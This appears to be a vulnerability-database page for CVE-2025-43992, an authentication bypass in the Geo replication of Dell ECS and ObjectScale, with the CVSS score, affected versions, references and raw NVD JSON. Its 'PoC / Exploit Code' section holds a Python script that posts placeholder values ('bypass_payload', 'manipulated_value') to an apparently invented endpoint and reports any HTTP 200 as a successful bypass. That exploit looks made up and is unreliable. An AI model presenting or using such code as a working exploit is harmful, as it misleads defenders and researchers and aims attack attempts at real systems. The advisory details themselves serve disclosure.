CVE-2025-43992

Description

Dell ECS versions 3.8.1.0 through 3.8.1.7 and Dell ObjectScale versions prior to 4.3.0.0, contains an authentication bypass by assumed-immutable data vulnerability in Geo replication. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access to data in transit.

CVSS Details

CVSS Score

5.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Dell ECS 3.8.1.0 - 3.8.1.7

Dell ObjectScale < 4.3.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# POC for CVE-2025-43992: Authentication Bypass in Dell ECS/ObjectScale
# Target: Geo Replication Endpoint

target_url = "https://<target-ip>:<port>/geo-replication/api"

headers = {
    "User-Agent": "Replication-Agent",
    "Content-Type": "application/json",
    # Exploit relies on bypassing auth via assumed-immutable headers/data
    "X-Geo-Replication-Token": "bypass_payload"
}

payload = {
    "action": "sync",
    "immutable_data": "manipulated_value"
}

try:
    response = requests.post(target_url, json=payload, headers=headers, verify=False, timeout=10)
    if response.status_code == 200:
        print("[+] Authentication bypassed. Unauthorized access gained.")
    else:
        print("[-] Attempt failed.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43992
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43992
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43992/
[4] VulDB https://vuldb.com/cve/CVE-2025-43992
[5] https://www.dell.com/support/kbdoc/en-us/000462117/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities-1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43992", "sourceIdentifier": "[email protected]", "published": "2026-05-11T10:16:12.727", "lastModified": "2026-05-12T14:17:10.613", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell ECS versions 3.8.1.0 through 3.8.1.7 and Dell ObjectScale versions prior to 4.3.0.0, contains an authentication bypass by assumed-immutable data vulnerability in Geo replication. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access to data in transit."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-302"}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000462117/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities-1", "source": "[email protected]"}]}}